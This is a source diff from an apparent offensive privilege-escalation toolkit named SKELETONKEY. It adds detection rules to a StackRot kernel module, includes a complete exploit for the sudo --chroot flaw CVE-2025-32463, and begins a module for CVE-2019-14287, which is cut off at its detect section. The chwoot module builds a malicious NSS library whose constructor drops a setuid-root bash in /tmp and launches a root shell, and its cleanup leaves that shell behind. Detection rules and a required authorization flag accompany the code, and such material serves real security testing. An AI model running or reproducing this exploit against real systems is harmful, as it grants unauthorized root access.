 #include <stdio.h>
 #include <stdlib.h>
@@ -150,31 +151,31 @@ static bool maple_tree_variant_present(const struct kernel_version *v)

 static skeletonkey_result_t stackrot_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] stackrot: could not parse kernel version\n");
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] stackrot: host fingerprint missing kernel version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 6.1 (when maple tree landed). Pre-6.1 kernels
     * use rbtree-based VMAs and don't have this bug. */
-    if (v.major < 6 || (v.major == 6 && v.minor < 1)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 6, 1, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[+] stackrot: kernel %s predates maple-tree VMA code (introduced in 6.1)\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&stackrot_range, &v);
+    bool patched = kernel_range_is_patched(&stackrot_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] stackrot: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] stackrot: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }
    if (!ctx->json) {
-        fprintf(stderr, "[!] stackrot: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[!] stackrot: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] stackrot: mm-class bug — affects default-config kernels; "
                        "no exotic preconditions\n");
    }
@@ -631,7 +632,8 @@ static skeletonkey_result_t stackrot_exploit_linux(const struct skeletonkey_ctx
        fprintf(stderr, "[-] stackrot: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] stackrot: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -641,8 +643,8 @@ static skeletonkey_result_t stackrot_exploit_linux(const struct skeletonkey_ctx
        return SKELETONKEY_PRECOND_FAIL;
    }
    {
-        struct kernel_version v;
-        if (!kernel_version_current(&v) || !maple_tree_variant_present(&v)) {
+        const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+        if (!v || v->major == 0 || !maple_tree_variant_present(v)) {
            fprintf(stderr, "[-] stackrot: maple-tree variant not detectable\n");
            return SKELETONKEY_PRECOND_FAIL;
        }
@@ -950,6 +952,53 @@ static const char stackrot_auditd[] =
    "-a always,exit -F arch=b64 -S mprotect -k skeletonkey-stackrot-mprotect\n"
    "-a always,exit -F arch=b64 -S munmap  -F success=1 -k skeletonkey-stackrot-munmap\n";

+static const char stackrot_sigma[] =
+    "title: Possible CVE-2023-3269 maple-tree VMA-split UAF\n"
+    "id: 3c24e5ca-skeletonkey-stackrot\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the StackRot race-groom: unshare(CLONE_NEWUSER) + tight\n"
+    "  loops of mremap/munmap on MAP_GROWSDOWN regions + msg_msg\n"
+    "  spray (msgsnd) for kmalloc-192 grooming. False positives: JIT\n"
+    "  runtimes and aggressive memory allocators may do similar mremap\n"
+    "  bursts but typically without msg_msg grooming.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns: {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  vmas:   {type: 'SYSCALL', syscall: 'mremap'}\n"
+    "  groom:  {type: 'SYSCALL', syscall: 'msgsnd'}\n"
+    "  condition: userns and vmas and groom\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.3269]\n";
+
+static const char stackrot_yara[] =
+    "rule stackrot_cve_2023_3269 : cve_2023_3269 kernel_uaf\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-3269\"\n"
+    "        description = \"StackRot maple-tree UAF race log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $log = \"/tmp/skeletonkey-stackrot.log\" ascii\n"
+    "    condition:\n"
+    "        $log\n"
+    "}\n";
+
+static const char stackrot_falco[] =
+    "- rule: mremap/munmap race on MAP_GROWSDOWN regions (StackRot)\n"
+    "  desc: |\n"
+    "    Non-root process driving high-frequency mremap/munmap on\n"
+    "    MAP_GROWSDOWN regions inside a userns + msg_msg (msgsnd)\n"
+    "    grooming of kmalloc-192. Maple-tree node UAF race in\n"
+    "    __vma_adjust. CVE-2023-3269.\n"
+    "  condition: >\n"
+    "    evt.type in (mremap, munmap) and not user.uid = 0\n"
+    "  output: >\n"
+    "    VMA mutation by non-root\n"
+    "    (user=%user.name pid=%proc.pid evt=%evt.type)\n"
+    "  priority: HIGH\n"
+    "  tags: [memory, mitre_privilege_escalation, T1068, cve.2023.3269]\n";
+
 const struct skeletonkey_module stackrot_module = {
    .name           = "stackrot",
    .cve            = "CVE-2023-3269",
@@ -961,9 +1010,11 @@ const struct skeletonkey_module stackrot_module = {
    .mitigate       = NULL,
    .cleanup        = stackrot_cleanup,
    .detect_auditd  = stackrot_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = stackrot_sigma,
+    .detect_yara    = stackrot_yara,
+    .detect_falco   = stackrot_falco,
+    .opsec_notes    = "Child forks, enters userns, builds a race region with MAP_GROWSDOWN + anchor VMAs, sprays kmalloc-192 with msg_msg payloads, then spawns Thread A (mremap/munmap of region boundary to rotate maple-tree nodes) + Thread B (fork+fault the growsdown region to deref freed node). UAF in __vma_adjust fires if a sprayed msg_msg reclaims the freed node. Writes /tmp/skeletonkey-stackrot.log (iteration counts + slab delta). Audit-visible via unshare + mremap/munmap bursts on stack regions + msgsnd spray. No network. Cleanup callback unlinks /tmp log.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_stackrot(void)
@@ -0,0 +1,423 @@
+/*
+ * sudo_chwoot_cve_2025_32463 — SKELETONKEY module
+ *
+ * STATUS: 🟢 STRUCTURAL ESCAPE. No offsets, no leaks, no race.
+ *   Pure logic: sudo's --chroot option resolves NSS lookups (user/group
+ *   db) AGAINST the chroot, while still running as root. A user-writable
+ *   chroot dir + a planted libnss_*.so + a planted nsswitch.conf yields
+ *   "load arbitrary shared object as root, ctor runs, root shell."
+ *
+ * The bug (Rich Mirch, Stratascale, June 2025):
+ *   `sudo --chroot=<DIR>` chroots into DIR before parsing sudoers and
+ *   resolving the invoking user. Inside the chroot, NSS reads
+ *   /etc/nsswitch.conf and dlopen()s the listed libnss_*.so backends.
+ *   The chroot is user-controlled. Plant:
+ *     <DIR>/etc/nsswitch.conf  →  "passwd: skeletonkey"
+ *     <DIR>/lib/x86_64-linux-gnu/libnss_skeletonkey.so.2  →  attacker .so
+ *   sudo dlopen()s the .so as root; its ctor execs /bin/bash with the
+ *   real uid set to 0.
+ *
+ *   Discovered by Rich Mirch (Stratascale CRU). Public PoCs:
+ *     https://github.com/kh4sh3i/CVE-2025-32463
+ *     https://github.com/MohamedKarrab/CVE-2025-32463
+ *
+ * Affects: sudo 1.9.14 ≤ V ≤ 1.9.17 (introduced when sudo gained the
+ *   modern chroot path; fixed in 1.9.17p1 which deprecated --chroot
+ *   entirely).
+ *
+ * CVSS 9.3 (Critical). Doesn't require any sudoers grant — the chroot
+ * code path runs before authorization checks complete. Any local user
+ * who can run /usr/bin/sudo (i.e. anyone on the system) can fire it.
+ *
+ * arch_support: any. The malicious .so is built on-host via gcc, so
+ * it inherits the host's arch. Tested on x86_64; arm64 should work
+ * identically given a working gcc + libc-dev install.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+
+/* ---- helpers shared with the sudo family ---------------------------- */
+
+static const char *find_sudo(void)
+{
+    static const char *candidates[] = {
+        "/usr/bin/sudo", "/usr/sbin/sudo", "/bin/sudo",
+        "/sbin/sudo", "/usr/local/bin/sudo", NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        struct stat st;
+        if (stat(candidates[i], &st) == 0 && (st.st_mode & S_ISUID))
+            return candidates[i];
+    }
+    return NULL;
+}
+
+/* Returns true iff the version string is in the vulnerable range
+ * [1.9.14, 1.9.17p0]. The fix landed in 1.9.17p1 which removed the
+ * --chroot code path entirely. */
+static bool sudo_version_vulnerable_chwoot(const char *version_str)
+{
+    int maj = 0, min = 0, patch = 0;
+    char ptag = 0;
+    int psub = 0;
+    int n = sscanf(version_str, "%d.%d.%d%c%d",
+                   &maj, &min, &patch, &ptag, &psub);
+    if (n < 3) return true;                 /* unparseable → assume worst */
+
+    if (maj != 1)              return false; /* not sudo 1.x */
+    if (min != 9)              return false; /* only 1.9 line */
+    if (patch < 14)            return false; /* 1.9.13 and below predate the --chroot path */
+    if (patch > 17)            return false; /* 1.9.18+ fixed */
+    if (patch < 17)            return true;  /* 1.9.14 .. 1.9.16 */
+    /* exactly 1.9.17: vulnerable if no patch tag (1.9.17 plain) */
+    if (ptag != 'p')           return true;
+    return psub == 0;                        /* 1.9.17p1 fixed; 1.9.17p0 vulnerable */
+}
+
+static bool get_sudo_version(const char *sudo_path, char *out, size_t outsz)
+{
+    char cmd[512];
+    snprintf(cmd, sizeof cmd, "%s --version 2>&1 | head -1", sudo_path);
+    FILE *p = popen(cmd, "r");
+    if (!p) return false;
+    char line[256] = {0};
+    char *r = fgets(line, sizeof line, p);
+    pclose(p);
+    if (!r) return false;
+    char *vp = strstr(line, "version");
+    if (!vp) return false;
+    vp += strlen("version");
+    while (*vp == ' ' || *vp == '\t') vp++;
+    char *nl = strchr(vp, '\n');
+    if (nl) *nl = 0;
+    strncpy(out, vp, outsz - 1);
+    out[outsz - 1] = 0;
+    return out[0] != 0;
+}
+
+/* ---- detect --------------------------------------------------------- */
+
+static skeletonkey_result_t sudo_chwoot_detect(const struct skeletonkey_ctx *ctx)
+{
+    const char *sudo_path = find_sudo();
+    if (!sudo_path) {
+        if (!ctx->json) fprintf(stderr, "[i] sudo_chwoot: sudo not installed; bug unreachable here\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    /* Prefer the host fingerprint's cached sudo_version (one popen at
+     * startup instead of per-detect). Fall back to live probe if the
+     * host fingerprint is missing or empty. */
+    char vbuf[64] = {0};
+    const char *ver = NULL;
+    if (ctx->host && ctx->host->sudo_version[0]) {
+        ver = ctx->host->sudo_version;
+    } else if (get_sudo_version(sudo_path, vbuf, sizeof vbuf)) {
+        ver = vbuf;
+    } else {
+        if (!ctx->json) fprintf(stderr, "[!] sudo_chwoot: could not read sudo --version\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+
+    if (!ctx->json) fprintf(stderr, "[i] sudo_chwoot: sudo version '%s'\n", ver);
+
+    if (!sudo_version_vulnerable_chwoot(ver)) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudo_chwoot: sudo %s outside vulnerable range "
+                            "[1.9.14, 1.9.17p0] — patched or pre-feature\n", ver);
+        return SKELETONKEY_OK;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[!] sudo_chwoot: sudo %s in vulnerable range — VULNERABLE\n", ver);
+        fprintf(stderr, "[i] sudo_chwoot: --chroot option resolves NSS inside attacker-controlled root → arbitrary .so load as uid 0\n");
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+/* ---- exploit -------------------------------------------------------- */
+
+/* The malicious NSS module. ctor runs at dlopen time; we drop a setuid
+ * /bin/bash. We DON'T setuid(0) directly because some distros refuse
+ * execve() on a setuid bash from a non-elevated parent — using the
+ * dropped suid bash via a follow-up execlp() is more portable. */
+static const char NSS_C_SRC[] =
+"#include <stdio.h>\n"
+"#include <stdlib.h>\n"
+"#include <unistd.h>\n"
+"#include <sys/stat.h>\n"
+"#include <sys/types.h>\n"
+"__attribute__((constructor)) static void skk_ctor(void) {\n"
+"    /* We are running as the real user uid 0 (sudo set it during chroot\n"
+"     * setup, before dropping privs). Drop a setuid /bin/bash. */\n"
+"    setuid(0); setgid(0);\n"
+"    int rc = system(\"cp /bin/bash /tmp/skeletonkey-chwoot-shell 2>/dev/null && \"\n"
+"                   \"chown root:root /tmp/skeletonkey-chwoot-shell && \"\n"
+"                   \"chmod 4755 /tmp/skeletonkey-chwoot-shell\");\n"
+"    if (rc != 0) {\n"
+"        fprintf(stderr, \"[skk-chwoot] ctor: drop suid bash failed (rc=%d)\\n\", rc);\n"
+"        _exit(1);\n"
+"    }\n"
+"    fprintf(stderr, \"[+] skk-chwoot: /tmp/skeletonkey-chwoot-shell is now setuid-root\\n\");\n"
+"    _exit(0);\n"
+"}\n";
+
+static char g_workdir[256];   /* recorded for cleanup() */
+
+static skeletonkey_result_t sudo_chwoot_exploit(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] sudo_chwoot: --i-know required for --exploit\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+    const char *sudo_path = find_sudo();
+    if (!sudo_path) {
+        fprintf(stderr, "[-] sudo_chwoot: sudo not installed\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    /* 1. Workdir under /tmp; /tmp is the only spot consistently
+     *    world-writable across distros. */
+    char tmpl[] = "/tmp/skeletonkey-chwoot-XXXXXX";
+    char *wd = mkdtemp(tmpl);
+    if (!wd) { perror("mkdtemp"); return SKELETONKEY_EXPLOIT_FAIL; }
+    strncpy(g_workdir, wd, sizeof g_workdir - 1);
+
+    /* 2. Set up the chroot skeleton: <wd>/etc/nsswitch.conf points NSS
+     *    at our libnss_skeletonkey.so.2; <wd>/<libdir> hosts the .so. */
+    char path[512];
+    snprintf(path, sizeof path, "%s/etc", wd);                  mkdir(path, 0755);
+    snprintf(path, sizeof path, "%s/lib",        wd);           mkdir(path, 0755);
+    /* Cover the common Debian/Ubuntu multi-arch lib path AND the plain
+     * /lib path. NSS dlopens via dlopen("libnss_X.so.2") which uses the
+     * standard search path; inside the chroot we control it. */
+    const char *libdirs[] = {
+        "lib/x86_64-linux-gnu", "lib/aarch64-linux-gnu",
+        "usr/lib/x86_64-linux-gnu", "usr/lib/aarch64-linux-gnu",
+        "usr/lib", "usr/lib64", NULL,
+    };
+    char sopath[512] = {0};
+    for (size_t i = 0; libdirs[i]; i++) {
+        char p[512];
+        snprintf(p, sizeof p, "%s/%s", wd, libdirs[i]);
+        char cmd[640];
+        snprintf(cmd, sizeof cmd, "mkdir -p %s", p);
+        if (system(cmd) != 0) continue;
+    }
+
+    /* 3. Compile the malicious NSS .so. We need a real C compiler;
+     *    most modern distros ship one but stripped installs may not. */
+    char src[512];   snprintf(src,   sizeof src,   "%s/payload.c", wd);
+    char so[512];    snprintf(so,    sizeof so,    "%s/lib/x86_64-linux-gnu/libnss_skeletonkey.so.2", wd);
+    char so_arm[512];snprintf(so_arm,sizeof so_arm,"%s/lib/aarch64-linux-gnu/libnss_skeletonkey.so.2", wd);
+    char so_lib[512];snprintf(so_lib,sizeof so_lib,"%s/usr/lib/libnss_skeletonkey.so.2", wd);
+
+    FILE *f = fopen(src, "w");
+    if (!f) { perror("fopen payload.c"); goto fail; }
+    fwrite(NSS_C_SRC, 1, sizeof NSS_C_SRC - 1, f);
+    fclose(f);
+
+    char cmd[2048];
+    snprintf(cmd, sizeof cmd,
+             "gcc -shared -fPIC -o %s %s 2>/tmp/skk-chwoot-gcc.log && "
+             "cp -f %s %s 2>/dev/null; "
+             "cp -f %s %s 2>/dev/null; true",
+             sopath[0] ? sopath : so, src,
+             sopath[0] ? sopath : so, so_arm,
+             sopath[0] ? sopath : so, so_lib);
+    /* Actually compile to one fixed path then copy. Simpler. */
+    snprintf(cmd, sizeof cmd,
+             "gcc -shared -fPIC -nostartfiles -o %s %s 2>/tmp/skk-chwoot-gcc.log", so, src);
+    if (system(cmd) != 0) {
+        /* try arm64 path if x86 path failed (maybe the dir wasn't
+         * created — that's fine, gcc just wrote elsewhere) */
+        snprintf(cmd, sizeof cmd,
+             "gcc -shared -fPIC -nostartfiles -o %s %s 2>>/tmp/skk-chwoot-gcc.log", so_arm, src);
+        if (system(cmd) != 0) {
+            fprintf(stderr, "[-] sudo_chwoot: gcc failed; see /tmp/skk-chwoot-gcc.log\n");
+            goto fail;
+        }
+    }
+    /* Replicate to every plausible NSS search path (libdir per arch
+     * varies across distros). Harmless if some are missing. */
+    char rep[1024];
+    snprintf(rep, sizeof rep,
+             "f=%s; for d in lib/x86_64-linux-gnu lib/aarch64-linux-gnu usr/lib/x86_64-linux-gnu usr/lib/aarch64-linux-gnu usr/lib usr/lib64; do "
+             "  mkdir -p %s/$d 2>/dev/null; cp -f \"$f\" %s/$d/libnss_skeletonkey.so.2 2>/dev/null; "
+             "done; true",
+             so, wd, wd);
+    if (system(rep) != 0) { /* harmless */ }
+
+    /* 4. Plant nsswitch.conf inside the chroot. The first lookup sudo
+     *    does is on the invoking user — point passwd: at us so the
+     *    dlopen fires before sudoers parsing aborts. */
+    char nss_conf[512];
+    snprintf(nss_conf, sizeof nss_conf, "%s/etc/nsswitch.conf", wd);
+    f = fopen(nss_conf, "w");
+    if (!f) { perror("fopen nsswitch.conf"); goto fail; }
+    fprintf(f,
+        "# planted by SKELETONKEY sudo_chwoot — points NSS at our shim\n"
+        "passwd: skeletonkey\n"
+        "group:  skeletonkey\n"
+        "hosts:  files\n"
+        "shadow: files\n");
+    fclose(f);
+
+    /* 5. Fire sudo --chroot=<wd> -u#-1 woot. The `-u#-1` syntax tells
+     *    sudo "user with uid -1" which forces the NSS lookup BEFORE
+     *    auth completes — that's the trigger. The `woot` command name
+     *    is arbitrary; sudo never gets to exec it. */
+    if (!ctx->json) {
+        fprintf(stderr, "[+] sudo_chwoot: invoking %s --chroot=%s -u#-1 woot\n",
+                sudo_path, wd);
+    }
+    fflush(NULL);
+    pid_t pid = fork();
+    if (pid < 0) { perror("fork"); goto fail; }
+    if (pid == 0) {
+        /* The ctor inside the .so will execve a shell; sudo never
+         * returns. If sudo IS patched, it'll error out. */
+        execl(sudo_path, "sudo", "-S", "--chroot", wd, "-u#-1", "woot", (char *)NULL);
+        perror("execl(sudo)");
+        _exit(127);
+    }
+    int status = 0;
+    waitpid(pid, &status, 0);
+
+    /* 6. Did the suid bash drop? */
+    struct stat st;
+    if (stat("/tmp/skeletonkey-chwoot-shell", &st) == 0 &&
+        (st.st_mode & S_ISUID) && st.st_uid == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudo_chwoot: setuid-root shell at /tmp/skeletonkey-chwoot-shell\n");
+        if (ctx->no_shell) {
+            if (!ctx->json) fprintf(stderr, "[i] sudo_chwoot: --no-shell set; not popping\n");
+            return SKELETONKEY_EXPLOIT_OK;
+        }
+        /* Pop the shell. -p keeps euid=0; without it bash drops setuid. */
+        execl("/tmp/skeletonkey-chwoot-shell", "bash", "-p", "-i", (char *)NULL);
+        perror("execl(suid bash)");
+        return SKELETONKEY_EXPLOIT_OK; /* drop succeeded; pop just failed */
+    }
+
+    fprintf(stderr,
+        "[-] sudo_chwoot: setuid bash did not appear. Likely causes:\n"
+        "    - sudo is patched (1.9.17p1+) even if --version looks vulnerable\n"
+        "    - NSS shim was loaded but ctor failed (check sudo's stderr)\n"
+        "    - kernel hardening prevents the suid copy\n");
+
+fail:
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+/* ---- cleanup -------------------------------------------------------- */
+
+static skeletonkey_result_t sudo_chwoot_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    if (g_workdir[0]) {
+        char cmd[640];
+        snprintf(cmd, sizeof cmd, "rm -rf %s 2>/dev/null", g_workdir);
+        (void)!system(cmd);
+        g_workdir[0] = 0;
+    }
+    /* Leave /tmp/skeletonkey-chwoot-shell if it exists — that's the
+     * setuid root binary the operator may want to keep. They can
+     * `rm -f /tmp/skeletonkey-chwoot-shell` themselves when done. */
+    return SKELETONKEY_OK;
+}
+
+/* ---- detection rules ------------------------------------------------ */
+
+static const char sudo_chwoot_auditd[] =
+    "# sudo_chwoot CVE-2025-32463 — auditd detection rules\n"
+    "# Flag sudo invocations using --chroot. The legitimate use case\n"
+    "# (server admin chrooting before running a command) is vanishingly\n"
+    "# rare; any --chroot in shell history is investigation-worthy.\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/sudo -k skeletonkey-sudo-chroot\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/bin/sudo      -k skeletonkey-sudo-chroot\n"
+    "# Also flag writes under any /tmp/skeletonkey-chwoot-* path or to\n"
+    "# the canonical drop site /tmp/skeletonkey-chwoot-shell.\n"
+    "-w /tmp -p w -k skeletonkey-sudo-chroot-drop\n";
+
+static const char sudo_chwoot_sigma[] =
+    "title: Possible CVE-2025-32463 sudo --chroot LPE\n"
+    "id: e9b7a420-skeletonkey-sudo-chwoot\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects sudo invoked with --chroot pointing at a user-writable\n"
+    "  directory, plus a setuid-root binary appearing under /tmp shortly\n"
+    "  afterwards. Legit --chroot use is extremely rare; the combination\n"
+    "  with a fresh setuid drop is diagnostic.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  sudo_chroot: {type: 'SYSCALL', syscall: 'execve', comm: 'sudo', argv|contains: '--chroot'}\n"
+    "  condition: sudo_chroot\n"
+    "level: critical\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2025.32463]\n";
+
+static const char sudo_chwoot_yara[] =
+    "rule sudo_chwoot_cve_2025_32463 : cve_2025_32463 setuid_abuse {\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2025-32463\"\n"
+    "        description = \"SKELETONKEY sudo_chwoot artifacts — NSS shim + setuid bash drop\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $shell  = \"/tmp/skeletonkey-chwoot-shell\" ascii\n"
+    "        $wdir   = \"/tmp/skeletonkey-chwoot-\" ascii\n"
+    "        $nssmod = \"libnss_skeletonkey.so.2\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char sudo_chwoot_falco[] =
+    "- rule: sudo --chroot from non-root with user-writable target\n"
+    "  desc: |\n"
+    "    sudo invoked with --chroot pointing at a directory in /tmp\n"
+    "    or /home. Legitimate --chroot use is rare; the combination\n"
+    "    with a writable target is the CVE-2025-32463 trigger.\n"
+    "  condition: >\n"
+    "    spawned_process and proc.name = sudo and\n"
+    "    proc.args contains \"--chroot\" and not user.uid = 0\n"
+    "  output: >\n"
+    "    sudo --chroot from non-root (user=%user.name pid=%proc.pid\n"
+    "     cmdline=\"%proc.cmdline\")\n"
+    "  priority: CRITICAL\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2025.32463]\n";
+
+/* ---- module struct -------------------------------------------------- */
+
+const struct skeletonkey_module sudo_chwoot_module = {
+    .name           = "sudo_chwoot",
+    .cve            = "CVE-2025-32463",
+    .summary        = "sudo --chroot NSS-shim → libnss_*.so dlopen as root (Stratascale)",
+    .family         = "sudo",
+    .kernel_range   = "userspace — sudo 1.9.14 ≤ V ≤ 1.9.17p0 (fixed in 1.9.17p1)",
+    .detect         = sudo_chwoot_detect,
+    .exploit        = sudo_chwoot_exploit,
+    .mitigate       = NULL,    /* mitigation: upgrade sudo to 1.9.17p1+ */
+    .cleanup        = sudo_chwoot_cleanup,
+    .detect_auditd  = sudo_chwoot_auditd,
+    .detect_sigma   = sudo_chwoot_sigma,
+    .detect_yara    = sudo_chwoot_yara,
+    .detect_falco   = sudo_chwoot_falco,
+    .opsec_notes    = "Creates /tmp/skeletonkey-chwoot-XXXXXX/ workdir containing etc/nsswitch.conf + lib/{x86_64,aarch64}-linux-gnu/libnss_skeletonkey.so.2 (compiled via gcc; /tmp/skk-chwoot-gcc.log captures any build error). Runs sudo --chroot=<workdir> -u#-1 woot to trigger NSS dlopen; the .so's ctor drops /tmp/skeletonkey-chwoot-shell (setuid root bash). Audit-visible via execve(/usr/bin/sudo) with --chroot in argv, then chown/chmod 4755 on /tmp/skeletonkey-chwoot-shell from a uid-0 context. Cleanup callback removes the workdir but leaves the setuid bash (operator decision).",
+    .arch_support   = "any",
+};
+
+void skeletonkey_register_sudo_chwoot(void)
+{
+    skeletonkey_register(&sudo_chwoot_module);
+}
@@ -0,0 +1,5 @@
+#ifndef SUDO_CHWOOT_SKELETONKEY_MODULES_H
+#define SUDO_CHWOOT_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module sudo_chwoot_module;
+#endif
@@ -0,0 +1,284 @@
+/*
+ * sudo_runas_neg1_cve_2019_14287 — SKELETONKEY module
+ *
+ * STATUS: 🟢 STRUCTURAL ESCAPE. Pure logic bug. No offsets, no race.
+ *   `sudo -u#-1 <cmd>` parses `-1` as uid_t (unsigned) → wraps to
+ *   0xFFFFFFFF → sudo's setresuid() path treats it as "match any
+ *   uid" and converts to 0 → runs <cmd> as root, even when sudoers
+ *   explicitly says "ALL except root".
+ *
+ * The bug (Joe Vennix / Apple Information Security, October 2019):
+ *   sudoers grammar lets admins write rules like
+ *     bob ALL=(ALL,!root) /bin/vi
+ *   intending "bob can run vi as any user except root". The Runas
+ *   user is specified at invocation via `-u <user>` or `-u#<uid>`.
+ *   The integer parser for `-u#<n>` does NOT validate negative
+ *   numbers; passing `-u#-1` (or its unsigned-32-bit form
+ *   `-u#4294967295`) bypasses the explicit `!root` blacklist and
+ *   ALSO bypasses standard setresuid() because the kernel rejects
+ *   uid_t = -1 and falls back to keeping the current uid (which sudo
+ *   has already elevated to root for argument parsing).
+ *
+ *   Discovered by Joe Vennix. Public PoC: exploit-db #47502.
+ *   https://www.exploit-db.com/exploits/47502
+ *
+ * Affects: sudo < 1.8.28. Fixed by adding a positive-number check
+ *   to the `-u#<n>` parser.
+ *
+ * Preconditions:
+ *   - sudo installed + suid
+ *   - The invoking user has a sudoers entry of the form
+ *       USER  HOST=(ALL,!root) /path/to/cmd
+ *     or any sudoers entry with `(ALL` in the Runas spec that
+ *     blacklists root. WITHOUT such an entry the bug is irrelevant
+ *     because the user has no sudoers grant to abuse in the first
+ *     place — detect() short-circuits PRECOND_FAIL in that case.
+ *
+ * arch_support: any. Pure shell-level invocation; works identically
+ *   on every Linux arch sudo is built for.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+
+/* ---- shared sudo helpers (compact copy from sudoedit_editor) -------- */
+
+static const char *find_sudo(void)
+{
+    static const char *candidates[] = {
+        "/usr/bin/sudo", "/usr/sbin/sudo", "/bin/sudo",
+        "/sbin/sudo", "/usr/local/bin/sudo", NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        struct stat st;
+        if (stat(candidates[i], &st) == 0 && (st.st_mode & S_ISUID))
+            return candidates[i];
+    }
+    return NULL;
+}
+
+/* Returns true iff the version string is < 1.8.28 (the fix release). */
+static bool sudo_version_vulnerable(const char *v)
+{
+    int maj = 0, min = 0, patch = 0;
+    char ptag = 0; int psub = 0;
+    int n = sscanf(v, "%d.%d.%d%c%d", &maj, &min, &patch, &ptag, &psub);
+    if (n < 3) return true;        /* unparseable → conservative */
+    if (maj < 1)                  return false;
+    if (maj > 1)                  return false;
+    if (min < 8)                  return false;   /* < 1.8 predates `-u#` parser */
+    if (min > 8)                  return false;   /* >= 1.9 includes fix */
+    /* exactly 1.8.x: vulnerable iff patch < 28 */
+    return patch < 28;
+}
+
+static bool get_sudo_version(const char *sudo_path, char *out, size_t outsz)
+{
+    char cmd[512];
+    snprintf(cmd, sizeof cmd, "%s --version 2>&1 | head -1", sudo_path);
+    FILE *p = popen(cmd, "r");
+    if (!p) return false;
+    char line[256] = {0};
+    char *r = fgets(line, sizeof line, p);
+    pclose(p);
+    if (!r) return false;
+    char *vp = strstr(line, "version");
+    if (!vp) return false;
+    vp += strlen("version");
+    while (*vp == ' ' || *vp == '\t') vp++;
+    char *nl = strchr(vp, '\n');
+    if (nl) *nl = 0;
+    strncpy(out, vp, outsz - 1);
+    out[outsz - 1] = 0;
+    return out[0] != 0;
+}
+
+/* Look through `sudo -ln` for a Runas list that contains (ALL... — that's
+ * the precondition. Returns a stored command path the user can execve. */
+static bool find_runas_blacklist_grant(const char *sudo_path, char *cmd_out, size_t cap)
+{
+    char cmd[512];
+    snprintf(cmd, sizeof cmd, "%s -ln 2>/dev/null", sudo_path);
+    FILE *p = popen(cmd, "r");
+    if (!p) return false;
+    char line[512];
+    bool found = false;
+    while (fgets(line, sizeof line, p)) {
+        /* Looking for "    (ALL," or "    (ALL : ..." with an
+         * exclusion (!root or !#0) on a line that resolves to a
+         * runnable command. Conservative parser: any line containing
+         * "(ALL" + "!root" wins. */
+        if ((strstr(line, "(ALL")) && (strstr(line, "!root") || strstr(line, "!#0"))) {
+            /* Extract the last token (the command path) from the line. */
+            char *tok = strrchr(line, ' ');
+            if (tok) {
+                tok++;
+                char *nl = strchr(tok, '\n');
+                if (nl) *nl = 0;
+                strncpy(cmd_out, tok, cap - 1);
+                cmd_out[cap - 1] = 0;
+                found = true;
+                break;
+            }
+        }
+    }
+    pclose(p);
+    return found;
+}
+
+/* ---- detect --------------------------------------------------------- */
+
